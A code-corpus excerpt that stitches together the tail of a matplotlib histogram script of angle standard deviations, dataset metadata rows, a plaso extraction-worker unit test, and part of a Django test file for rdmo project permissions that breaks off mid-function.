[7.139919695904992, 6.091186677843476],
[7.930783504041922, 6.31551486280533],
[7.469449854326634, 5.159645256391554],
[20.746588130132885, 8.084467297957575],
[6.018242339961669, 2.455006569825223],
[6.221065720140407, 1.8444794858743812],
[4.433117324180472, 1.9414418755023324],
[7.648743254380252, 3.257370873095939],
[3.1990871251820026, 3.6130256259877207],
[3.8285647411742985, 1.878975582108213],
[7.060678719911859, 3.618460185670135],
[6.384641291520963, 1.736955799614506],
[21.33088126083242, 4.112066552358572],
[12.78702621798014, 7.022321800762671],
[10.573586033422723, 5.889495426088143],
[22.01908128270974, 3.805279465650763],
[16.59452827095705, 7.248826600721748],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[11.254633746150182, 4.454268273233757],
[11.978891311426532, 4.674763680292224],
[9.549239473505697, 3.6282603751507314],
[9.51096699847288, 2.5480332991806334],
[10.407688532648766, 4.61081242725336],
[8.745112797664264, 3.904397543504395],
[7.916578028132151, 3.1857693626187498],
[11.585970371549058, 4.421639673447624],
[8.451288396654498, 7.1685106583930445],
[7.012638573452989, 7.137474062991739],
[7.428745884499296, 3.948587570104591],
[7.464807214368578, 4.690885029474544],
[6.48937276124812, 4.800578882043143],
[5.539849214850788, 5.949223698391216],
[12.603920074979019, 4.528716381518033],
[7.736549504370702, 3.0401062740968237],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[9.31164605264972, 3.6057299715043056],
[7.916578028132151, 3.1857693626187498],
[9.418160268699934, 4.337590860271318],
[7.905778234791283, 1.7947612929705807],
[9.215078124413676, 3.8034825172915108],
[12.603920074979019, 4.528716381518033],
[10.823832281689429, 4.526520213980637],
[8.256646510635516, 3.5516008947314193],
[10.984574194928442, 4.504231445805296],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[7.916578028132151, 3.1857693626187498],
[8.745112797664264, 3.904397543504395],
[10.751161489077203, 4.225586173294387],
[7.736549504370702, 3.0401062740968237],
[9.091367959976361, 1.0611075859642212],
[7.3422331382197745, 3.275992682227498],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[11.254633746150182, 4.454268273233757],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[9.51096699847288, 2.5480332991806334],
[7.916578028132151, 3.1857693626187498],
[9.418160268699934, 4.337590860271318],
[10.407688532648766, 4.61081242725336],
[11.585970371549058, 4.421639673447624],
[11.599493458855028, 4.6319068463010415],
[4.13832415287115, 3.791493370103742],
[2.6640740853075005, 2.3912359557692726],
[10.868473100078905, 6.500681652985371],
[7.366786430174513, 6.428369989001501],
[7.785473193141325, 4.667062798186051],
[12.603920074979019, 4.528716381518033],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[9.51096699847288, 2.5480332991806334],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[8.745112797664264, 3.904397543504395],
[9.418160268699934, 4.337590860271318],
[10.751161489077203, 4.225586173294387],
[7.897289837095821, 7.843623717963191],
[10.00927361084607, 8.043380871528857],
[11.599493458855028, 4.6319068463010415],
[4.13832415287115, 3.791493370103742],
[11.84389834840664, 7.2194803662491545],
[10.868473100078905, 6.500681652985371],
[4.6484348578469525, 4.498128244166764],
[6.453340793815525, 7.208049672169001],
[7.785473193141325, 4.667062798186051],
[12.603920074979019, 4.528716381518033],
[10.823832281689429, 4.526520213980637],
[8.256646510635516, 3.5516008947314193],
[10.984574194928442, 4.504231445805296],
[11.136964472776878, 4.9173911163438655],
[7.916578028132151, 3.1857693626187498],
[11.341575206707201, 4.471666422261309],
[9.418160268699934, 4.337590860271318],
[10.751161489077203, 4.225586173294387],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[11.254633746150182, 4.454268273233757],
[11.978891311426532, 4.674763680292224],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[11.585970371549058, 4.421639673447624],
[8.745112797664264, 3.904397543504395],
[14.061529712863761, 4.184586609941457],
[11.73904635519336, 4.45219662549153],
[10.823832281689429, 4.526520213980637],
[11.632301136566992, 4.463092598239933],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[9.418160268699934, 4.337590860271318],
[11.341575206707201, 4.471666422261309],
[7.861346418623317, 2.0914747316056297],
[9.51096699847288, 2.5480332991806334],
[9.394172311872296, 1.1886529769801988],
[9.549239473505697, 3.6282603751507314],
[10.214376654253327, 1.3079362050833723],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[10.119140125037134, 1.1663607451259574],
[7.861346418623317, 2.0914747316056297],
[8.075345535704072, 1.883180556041472],
[9.51096699847288, 2.5480332991806334],
[9.091367959976361, 1.0611075859642212],
[9.394172311872296, 1.1886529769801988],
[10.30731318365394, 1.320002756139349],
[10.214376654253327, 1.3079362050833723],
[9.554736555992315, 1.6223503617210633],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[11.73904635519336, 4.45219662549153],
[11.341575206707201, 4.471666422261309],
[11.254633746150182, 4.454268273233757],
[11.632301136566992, 4.463092598239933],
[10.984574194928442, 4.504231445805296],
[10.423913162457975, 4.607263376292237],
[9.418160268699934, 4.337590860271318],
[11.73904635519336, 4.45219662549153],
[10.823832281689429, 4.526520213980637],
[11.632301136566992, 4.463092598239933],
[10.984574194928442, 4.504231445805296],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[10.119140125037134, 1.1663607451259574],
[7.861346418623317, 2.0914747316056297],
[9.51096699847288, 2.5480332991806334],
[9.091367959976361, 1.0611075859642212],
[10.30731318365394, 1.320002756139349],
[10.214376654253327, 1.3079362050833723],
[9.554736555992315, 1.6223503617210633],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[9.51096699847288, 2.5480332991806334],
[11.978891311426532, 4.674763680292224],
[9.09247114452116, 4.0768261627605655],
[10.407688532648766, 4.61081242725336],
[9.554736555992315, 1.6223503617210633],
[8.745112797664264, 3.904397543504395],
[7.916578028132151, 3.1857693626187498],
[11.73904635519336, 4.45219662549153],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[11.254633746150182, 4.454268273233757],
[11.632301136566992, 4.463092598239933],
[9.09247114452116, 4.0768261627605655],
[14.061529712863761, 4.184586609941457],
[10.407688532648766, 4.61081242725336],
[8.745112797664264, 3.904397543504395],
[11.978891311426532, 4.674763680292224],
[11.854118699116208, 4.376073110005652],
[10.119140125037134, 1.1663607451259574],
[8.075345535704072, 1.883180556041472],
[9.394172311872296, 1.1886529769801988],
[10.30731318365394, 1.320002756139349],
[10.214376654253327, 1.3079362050833723],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.861346418623317, 2.0914747316056297],
[8.256646510635516, 3.5516008947314193],
[9.394172311872296, 1.1886529769801988],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[7.916578028132151, 3.1857693626187498],
[9.554736555992315, 1.6223503617210633],
[8.745112797664264, 3.904397543504395],
[8.83870919041701, 0.8672354821446215],
[8.339558625443825, 1.1524807688385876],
[7.905778234791283, 1.7947612929705807],
[11.73904635519336, 4.45219662549153],
[12.612098652960508, 4.081772741325043],
[10.823832281689429, 4.526520213980637],
[11.632301136566992, 4.463092598239933],
[9.09247114452116, 4.0768261627605655],
[10.407688532648766, 4.61081242725336],
[8.745112797664264, 3.904397543504395],
[11.585970371549058, 4.421639673447624],
[11.854118699116208, 4.376073110005652],
[8.256646510635516, 3.5516008947314193],
[10.423913162457975, 4.607263376292237],
[11.136964472776878, 4.9173911163438655],
[9.31164605264972, 3.6057299715043056],
[7.916578028132151, 3.1857693626187498],
[9.418160268699934, 4.337590860271318],
[9.215078124413676, 3.8034825172915108],
[10.751161489077203, 4.225586173294387],
[12.603920074979019, 4.528716381518033],
[11.341575206707201, 4.471666422261309],
[8.256646510635516, 3.5516008947314193],
[11.240169537763931, 4.0776607288866025],
[10.984574194928442, 4.504231445805296],
[10.423913162457975, 4.607263376292237],
[7.916578028132151, 3.1857693626187498],
[9.418160268699934, 4.337590860271318],
[10.751161489077203, 4.225586173294387],
[16.71893425153499, 6.886618893628182],
[16.59452827095705, 7.248826600721748],
[22.01908128270974, 3.805279465650763],
[10.163158579142998, 0.990417839918792],
[9.091367959976361, 1.0611075859642212],
[9.394172311872296, 1.1886529769801988],
[10.30731318365394, 1.320002756139349],
[10.214376654253327, 1.3079362050833723],
[8.83870919041701, 0.8672354821446215],
[12.612098652960508, 4.081772741325043],
[10.823832281689429, 4.526520213980637],
[11.254633746150182, 4.454268273233757],
[11.632301136566992, 4.463092598239933],
[10.984574194928442, 4.504231445805296],
[10.635474900732435, 4.557320597258936],
[11.585970371549058, 4.421639673447624],
[11.854118699116208, 4.376073110005652],
[11.341575206707201, 4.471666422261309],
[10.119140125037134, 1.1663607451259574],
[10.163158579142998, 0.990417839918792],
[9.091367959976361, 1.0611075859642212],
[9.394172311872296, 1.1886529769801988],
[10.30731318365394, 1.320002756139349],
[9.554736555992315, 1.6223503617210633],
[8.83870919041701, 0.8672354821446215],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[9.09247114452116, 4.0768261627605655],
[9.549239473505697, 3.6282603751507314],
[10.407688532648766, 4.61081242725336],
[14.061529712863761, 4.184586609941457],
[11.585970371549058, 4.421639673447624],
[11.73904635519336, 4.45219662549153],
[14.061529712863761, 4.184586609941457],
[13.378843848667675, 4.03689538425491],
[11.254633746150182, 4.454268273233757],
[11.632301136566992, 4.463092598239933],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[10.635474900732435, 4.557320597258936],
[9.046138685340281, 4.4989558659515545],
[11.585970371549058, 4.421639673447624],
[10.5295359251904, 4.913327175929032],
[11.978891311426532, 4.674763680292224],
[10.407688532648766, 4.61081242725336],
[11.854118699116208, 4.376073110005652],
[11.73904635519336, 4.45219662549153],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[11.254633746150182, 4.454268273233757],
[11.632301136566992, 4.463092598239933],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[10.635474900732435, 4.557320597258936],
[9.046138685340281, 4.4989558659515545],
[11.585970371549058, 4.421639673447624],
[10.5295359251904, 4.913327175929032],
[11.73904635519336, 4.45219662549153],
[12.612098652960508, 4.081772741325043],
[10.823832281689429, 4.526520213980637],
[11.254633746150182, 4.454268273233757],
[10.984574194928442, 4.504231445805296],
[11.585970371549058, 4.421639673447624],
[11.854118699116208, 4.376073110005652],
[11.341575206707201, 4.471666422261309],
[12.612098652960508, 4.081772741325043],
[10.635474900732435, 4.557320597258936],
[11.978891311426532, 4.674763680292224],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[14.061529712863761, 4.184586609941457],
[9.046138685340281, 4.4989558659515545],
[10.407688532648766, 4.61081242725336],
[10.5295359251904, 4.913327175929032],
[11.585970371549058, 4.421639673447624],
[11.854118699116208, 4.376073110005652],
[16.71893425153499, 6.886618893628182],
[23.468500408907552, 2.344280788284791],
[21.33088126083242, 4.112066552358572],
[16.59452827095705, 7.248826600721748],
[21.676622148114877, 1.4140388591859752],
[7.142804913450352, 2.3719820232546924],
[8.54798198686671, 4.392237959001067],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[9.70851317614466, 6.764568760710533],
[12.390006549779804, 2.8565142569979605],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[6.318696553751853, 2.6493957765030025],
[9.228222681876002, 4.707914178930707],
[7.868234704679868, 6.1038468248930515],
[7.757238842667287, 3.6066908442572694],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[11.978891311426532, 4.674763680292224],
[13.38441619590509, 4.458076240550244],
[10.407688532648766, 4.61081242725336],
[11.585970371549058, 4.421639673447624],
[11.73904635519336, 4.45219662549153],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[7.400504118242411, 3.9849382544120675],
[9.046138685340281, 4.4989558659515545],
[10.5295359251904, 4.913327175929032],
[11.854118699116208, 4.376073110005652],
[10.119140125037134, 1.1663607451259574],
[10.163158579142998, 0.990417839918792],
[9.091367959976361, 1.0611075859642212],
[9.394172311872296, 1.1886529769801988],
[10.214376654253327, 1.3079362050833723],
[8.83870919041701, 0.8672354821446215],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[10.635474900732435, 4.557320597258936],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[7.400504118242411, 3.9849382544120675],
[9.046138685340281, 4.4989558659515545],
[10.627155716160557, 4.390483829087929],
[11.854118699116208, 4.376073110005652],
[10.119140125037134, 1.1663607451259574],
[10.30731318365394, 1.320002756139349],
[10.214376654253327, 1.3079362050833723],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[10.635474900732435, 4.557320597258936],
[13.38441619590509, 4.458076240550244],
[12.543458707847805, 5.100990892907957],
[7.400504118242411, 3.9849382544120675],
[10.5295359251904, 4.913327175929032],
[10.627155716160557, 4.390483829087929],
[11.854118699116208, 4.376073110005652],
[15.272869558340066, 5.179633920566634],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[4.8656085177216335, 3.507236448349241],
[9.436127302593512, 5.541398982964392],
[12.511000378851987, 3.547264743632041],
[5.435836143120371, 2.8043480606961375],
[22.01908128270974, 3.805279465650763],
[10.635474900732435, 4.557320597258936],
[9.046138685340281, 4.4989558659515545],
[10.627155716160557, 4.390483829087929],
[10.5295359251904, 4.913327175929032],
[9.562013253827118, 1.382481055479219],
[11.136964472776878, 4.9173911163438655],
[9.313523271207726, 7.409010602010248],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[10.635474900732435, 4.557320597258936],
[12.543458707847805, 5.100990892907957],
[14.061529712863761, 4.184586609941457],
[9.046138685340281, 4.4989558659515545],
[10.5295359251904, 4.913327175929032],
[11.854118699116208, 4.376073110005652],
[9.093734478018916, 5.639890645533],
[12.543458707847805, 5.100990892907957],
[7.400504118242411, 3.9849382544120675],
[9.046138685340281, 4.4989558659515545],
[10.5295359251904, 4.913327175929032],
[34.23962980612289, 5.724098619097325],
[12.612098652960508, 4.081772741325043],
[13.378843848667675, 4.03689538425491],
[10.635474900732435, 4.557320597258936],
[13.38441619590509, 4.458076240550244],
[9.046138685340281, 4.4989558659515545],
[10.5295359251904, 4.913327175929032],
[10.627155716160557, 4.390483829087929],
[11.854118699116208, 4.376073110005652],
[7.400504118242411, 3.9849382544120675],
[7.648743254380252, 3.257370873095939],
[15.006366271051672, 4.232282823070333],
[12.648689092385144, 4.264422651010618],
[8.612843130856907, 4.3063128973519245],
[10.627155716160557, 4.390483829087929],
[22.01908128270974, 3.805279465650763],
[7.142804913450352, 2.3719820232546924],
[11.052943486906425, 4.056670488652025],
[8.54798198686671, 4.392237959001067],
[8.591695637435324, 4.571358857179722],
[6.81037827822504, 2.028443179487512],
[6.318696553751853, 2.6493957765030025],
[6.925060823285094, 3.9322925779230595],
[7.757238842667287, 3.6066908442572694],
[12.390006549779804, 2.8565142569979605],
[11.052943486906425, 4.056670488652025],
[7.868234704679868, 6.1038468248930515],
[6.925060823285094, 3.9322925779230595],
[10.791267205626388, 4.524959636297345],
[9.228222681876002, 4.707914178930707],
[9.70851317614466, 6.764568760710533]
]
d = [e[1] for e in measurements_mean_std]
# An "interface" to matplotlib.axes.Axes.hist() method
n, bins, patches = plt.hist(x=d, bins='auto', color='#0504aa',
alpha=0.7, rwidth=0.85)
plt.grid(axis='y', alpha=0.75)
plt.xlabel('Std $\\sigma^2$')
plt.ylabel('Frequency')
plt.title('Histogram of neighboring angles standard deviation')
plt.text(23, 45, r'$\mu=15, b=3$')
maxfreq = n.max()
# Set a clean upper y-axis limit.
plt.ylim(ymax=np.ceil(maxfreq / 10) * 10 if maxfreq % 10 else maxfreq + 10)
plt.show()
| 41.354908
| 75
| 0.782293
| 7,431
| 76,672
| 8.071054
| 0.069843
| 0.004002
| 0.004252
| 0.008253
| 0.906813
| 0.852291
| 0.852291
| 0.852291
| 0.653411
| 0.594655
| 0
| 0.838389
| 0.073038
| 76,672
| 1,854
| 76
| 41.354908
| 0.005487
| 0.00133
| 0
| 0.984832
| 0
| 0
| 0.001293
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001083
| 0
| 0.001083
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4e9569d90c12a42bbd55b6f51dc2c6ae5db64c33
| 7,137
|
py
|
Python
|
tests/engine/worker.py
|
Defense-Cyber-Crime-Center/plaso
|
4f3a85fbea10637c1cdbf0cde9fc539fdcea9c47
|
[
"Apache-2.0"
] | 2
|
2016-02-18T12:46:29.000Z
|
2022-03-13T03:04:59.000Z
|
tests/engine/worker.py
|
Defense-Cyber-Crime-Center/plaso
|
4f3a85fbea10637c1cdbf0cde9fc539fdcea9c47
|
[
"Apache-2.0"
] | null | null | null |
tests/engine/worker.py
|
Defense-Cyber-Crime-Center/plaso
|
4f3a85fbea10637c1cdbf0cde9fc539fdcea9c47
|
[
"Apache-2.0"
] | 6
|
2016-12-18T08:05:36.000Z
|
2021-04-06T14:19:11.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests the worker."""
import unittest
from dfvfs.lib import definitions as dfvfs_definitions
from dfvfs.path import factory as path_spec_factory
from dfvfs.resolver import context
from plaso.engine import knowledge_base
from plaso.engine import single_process
from plaso.engine import worker
from plaso.parsers import mediator as parsers_mediator
from tests.engine import test_lib
class BaseEventExtractionWorkerTest(test_lib.EngineTestCase):
"""Tests for the worker object."""
def testExtractionWorker(self):
"""Tests the extraction worker functionality."""
path_spec_queue = single_process.SingleProcessQueue()
event_object_queue = single_process.SingleProcessQueue()
parse_error_queue = single_process.SingleProcessQueue()
event_queue_producer = single_process.SingleProcessItemQueueProducer(
event_object_queue)
parse_error_queue_producer = single_process.SingleProcessItemQueueProducer(
parse_error_queue)
knowledge_base_object = knowledge_base.KnowledgeBase()
parser_mediator = parsers_mediator.ParserMediator(
event_queue_producer, parse_error_queue_producer,
knowledge_base_object)
resolver_context = context.Context()
extraction_worker = worker.BaseEventExtractionWorker(
0, path_spec_queue, event_queue_producer, parse_error_queue_producer,
parser_mediator, resolver_context=resolver_context)
self.assertNotEqual(extraction_worker, None)
extraction_worker.InitializeParserObjects()
# Process a file.
source_path = self._GetTestFilePath([u'syslog'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 16)
# Process a compressed file.
source_path = self._GetTestFilePath([u'syslog.gz'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 16)
source_path = self._GetTestFilePath([u'syslog.bz2'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 15)
# Process a file in an archive.
source_path = self._GetTestFilePath([u'syslog.tar'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_TAR, location=u'/syslog',
parent=path_spec)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 13)
# Process an archive file without "process archive files" mode.
extraction_worker.SetProcessArchiveFiles(False)
source_path = self._GetTestFilePath([u'syslog.tar'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 3)
# Process an archive file with "process archive files" mode.
extraction_worker.SetProcessArchiveFiles(True)
source_path = self._GetTestFilePath([u'syslog.tar'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 16)
# Process a file in a compressed archive.
source_path = self._GetTestFilePath([u'syslog.tgz'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_GZIP, parent=path_spec)
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_TAR, location=u'/syslog',
parent=path_spec)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 13)
# Process an archive file with "process archive files" mode.
extraction_worker.SetProcessArchiveFiles(True)
source_path = self._GetTestFilePath([u'syslog.tgz'])
path_spec = path_spec_factory.Factory.NewPathSpec(
dfvfs_definitions.TYPE_INDICATOR_OS, location=source_path)
path_spec_queue.PushItem(path_spec)
extraction_worker.Run()
test_queue_consumer = test_lib.TestQueueConsumer(event_object_queue)
test_queue_consumer.ConsumeItems()
self.assertEqual(test_queue_consumer.number_of_items, 17)
def testExtractionWorkerHashing(self):
"""Test that the worker sets up and runs hashing code correctly."""
path_spec_queue = single_process.SingleProcessQueue()
event_object_queue = single_process.SingleProcessQueue()
parse_error_queue = single_process.SingleProcessQueue()
event_queue_producer = single_process.SingleProcessItemQueueProducer(
event_object_queue)
parse_error_queue_producer = single_process.SingleProcessItemQueueProducer(
parse_error_queue)
knowledge_base_object = knowledge_base.KnowledgeBase()
parser_mediator = parsers_mediator.ParserMediator(
event_queue_producer, parse_error_queue_producer,
knowledge_base_object)
resolver_context = context.Context()
extraction_worker = worker.BaseEventExtractionWorker(
0, path_spec_queue, event_queue_producer, parse_error_queue_producer,
parser_mediator, resolver_context=resolver_context)
# We're going to check that the worker set up its internal state correctly.
# pylint: disable=protected-access
extraction_worker.SetHashers(hasher_names_string=u'md5')
self.assertEqual(1, len(extraction_worker._hasher_names))
extraction_worker.InitializeParserObjects()
if __name__ == '__main__':
unittest.main()
| 36.045455
| 79
| 0.781281
| 845
| 7,137
| 6.209467
| 0.152663
| 0.070135
| 0.077759
| 0.042691
| 0.816848
| 0.81418
| 0.807318
| 0.777778
| 0.777778
| 0.777778
| 0
| 0.00344
| 0.144739
| 7,137
| 197
| 80
| 36.228426
| 0.85616
| 0.082668
| 0
| 0.798387
| 0
| 0
| 0.015347
| 0
| 0
| 0
| 0
| 0
| 0.080645
| 1
| 0.016129
| false
| 0
| 0.072581
| 0
| 0.096774
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ed39189f6f4f17e55e2a6b324e7623e1bdbc6b6
| 22,246
|
py
|
Python
|
rdmo/projects/tests/test_view_project.py
|
m6121/rdmo
|
db3990c7525138c6ce9634fc3e5b6b8ee9b915c8
|
[
"Apache-2.0"
] | null | null | null |
rdmo/projects/tests/test_view_project.py
|
m6121/rdmo
|
db3990c7525138c6ce9634fc3e5b6b8ee9b915c8
|
[
"Apache-2.0"
] | null | null | null |
rdmo/projects/tests/test_view_project.py
|
m6121/rdmo
|
db3990c7525138c6ce9634fc3e5b6b8ee9b915c8
|
[
"Apache-2.0"
] | null | null | null |
import re
import pytest
from django.urls import reverse
from rdmo.views.models import View
from ..models import Project
users = (
('owner', 'owner'),
('manager', 'manager'),
('author', 'author'),
('guest', 'guest'),
('user', 'user'),
('site', 'site'),
('anonymous', None),
)
view_project_permission_map = {
'owner': [1, 2, 3, 4, 5],
'manager': [1, 3, 5, 7],
'author': [1, 3, 5, 8],
'guest': [1, 3, 5, 9],
'api': [1, 2, 3, 4, 5],
'site': [1, 2, 3, 4, 5, 6, 7, 8, 9]
}
change_project_permission_map = {
'owner': [1, 2, 3, 4, 5],
'manager': [1, 3, 5, 7],
'api': [1, 2, 3, 4, 5],
'site': [1, 2, 3, 4, 5, 6, 7, 8, 9]
}
delete_project_permission_map = {
'owner': [1, 2, 3, 4, 5],
'api': [1, 2, 3, 4, 5],
'site': [1, 2, 3, 4, 5, 6, 7, 8, 9]
}
export_project_permission_map = {
'owner': [1, 2, 3, 4, 5],
'manager': [1, 3, 5, 7],
'api': [1, 2, 3, 4, 5],
'site': [1, 2, 3, 4, 5, 6, 7, 8, 9]
}
projects = [1, 2, 3, 4, 5, 6, 7, 8, 9]
export_formats = ('rtf', 'odt', 'docx', 'html', 'markdown', 'tex', 'pdf')
site_id = 1
parent_project_id = 1
catalog_id = 1
@pytest.mark.parametrize('username,password', users)
def test_list(db, client, username, password):
client.login(username=username, password=password)
url = reverse('projects')
response = client.get(url)
projects = re.findall(r'/projects/(\d+)/', response.content.decode())
if password:
assert response.status_code == 200
if username == 'site':
assert projects == []
else:
assert sorted(list(set([int(project_id) for project_id in projects]))) \
== view_project_permission_map.get(username, [])
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
def test_site(db, client, username, password):
client.login(username=username, password=password)
url = reverse('site_projects')
response = client.get(url)
projects = re.findall(r'/projects/(\d+)/update/', response.content.decode())
if username == 'site':
assert sorted([int(project_id) for project_id in projects]) \
== view_project_permission_map.get(username, [])
elif password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_detail(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project', args=[project_id])
response = client.get(url)
if project_id in view_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
def test_project_create_get(db, client, username, password):
client.login(username=username, password=password)
url = reverse('project_create')
response = client.get(url)
if password:
assert response.status_code == 200
# check the parent select dropdown
for project_id in re.findall(r'<option value="(\d+)"', response.content.decode()):
assert int(project_id) in view_project_permission_map.get(username, [])
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
def test_project_create_post(db, client, username, password):
client.login(username=username, password=password)
project_count = Project.objects.count()
url = reverse('project_create')
data = {
'title': 'A new project',
'description': 'Some description',
'catalog': catalog_id
}
response = client.post(url, data)
if password:
assert response.status_code == 302
assert Project.objects.count() == project_count + 1
else:
assert response.status_code == 302
assert Project.objects.count() == project_count
@pytest.mark.parametrize('username,password', users)
def test_project_create_parent_post(db, client, username, password):
client.login(username=username, password=password)
project_count = Project.objects.count()
url = reverse('project_create')
data = {
'title': 'A new project',
'description': 'Some description',
'catalog': catalog_id,
'parent': parent_project_id
}
response = client.post(url, data)
if username == 'user':
assert response.status_code == 200
assert Project.objects.count() == project_count
elif password:
assert response.status_code == 302
assert Project.objects.count() == project_count + 1
else:
assert response.status_code == 302
assert Project.objects.count() == project_count
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_get(db, client, username, password, project_id):
client.login(username=username, password=password)
url = reverse('project_update', args=[project_id])
response = client.get(url)
if project_id in change_project_permission_map.get(username, []):
assert response.status_code == 200
else:
if password:
assert response.status_code == 403
else:
assert response.status_code == 302
@pytest.mark.parametrize('username,password', users)
@pytest.mark.parametrize('project_id', projects)
def test_project_update_post(db, client, username, password, project_id):
client.login(username=username, password=password)
project = Project.objects.get(pk=project_id)
url = reverse('project_update', args=[project_id])
data = {
'title': 'New title',
'description': project.description,
'catalog': project.catalog.pk
}
response = client.post(url, data)
